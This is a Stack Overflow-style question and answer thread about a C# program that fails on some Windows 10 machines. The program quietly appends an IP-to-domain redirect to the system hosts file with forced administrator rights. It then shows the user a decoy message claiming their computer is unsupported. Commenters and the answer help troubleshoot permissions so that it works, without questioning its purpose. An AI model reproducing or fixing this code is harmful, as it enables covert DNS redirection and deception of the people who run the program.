# Apps not running on different machines

Tags: c#, .net

I have this code:

```
using System;
using System.IO;
using System.Net;
using System.Net.Mail;

namespace Nameddd
{
    class Program
    {
        static void Main(string[] args)
        {
            Hosts();
            Console.WriteLine("Loading..");
            Console.WriteLine("Your computer is not supported");
            Console.ReadKey();
        }
        static void Hosts()
        {
        {
            using (StreamWriter w = File.AppendText(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "drivers/etc/hosts")))
            {
                w.WriteLine("SOME_IP domain.com");
            }
        }
```

This program is working for me but apparently not on every system. I used VS 2015 community on Windows 10. On another computer my friend (with windows 7) - also working.

But for someone with Windows 10 it is not working. Application is not running, "loading cursor" - that's it. If I'm trying to delete the .exe it shows a message box with text like "process already running".

Comment: Do the account under which this program runs have read/write access to the file you are trying to write to?

Comment: etc/hosts is an odd file. its under the system32 directory which gets messed with by 32/64 bit wizardy on windows http://stackoverflow.com/questions/1855042/system32-folder-on-a-64-bit-system

Comment: Maybe are there problems with UAC or antivirus?

Comment: @pm100 I don't understand what you mean. I have 64 bit - work, my friend also have 64 bit and not work

Comment: try opening the hosts file with notepad on both machines

Comment: When you run it, do you right click it and select "Run as administrator"?

Comment: one thing thats suspicious is that the program hangs, if its a permission thing it should just die

Answer (score 0):

Make sure you are running the code or executable **as administrator**.
You probably opened the file but couldn't save the changes to the file for the friend that the code failed.

from another post from [here](https://stackoverflow.com/questions/2818179/how-to-force-my-net-app-to-run-as-administrator-on-windows-7) you can check it like this:

```
using System.Security.Principal;
public bool IsUserAdministrator()
{             
    bool isAdmin;
    try
    {
        WindowsIdentity user = WindowsIdentity.GetCurrent();
        WindowsPrincipal principal = new WindowsPrincipal(user);
        isAdmin = principal.IsInRole(WindowsBuiltInRole.Administrator);
    }
    catch (UnauthorizedAccessException ex)
    {
        isAdmin = false;
    }
    catch (Exception ex)
    {
        isAdmin = false;
    }
    return isAdmin;
}
```

Comment: Thanks for reply, but I configure my manifest and my app runing always as administrator. "shield on icon" also have

Comment: Could be an ACL issue. Seems that if Windows was upgraded from certain previous versions of Windows it may have a read-only behavior even if executed as Administrator.     (source) http://arstechnica.com/civis/viewtopic.php?f=15&t=1244947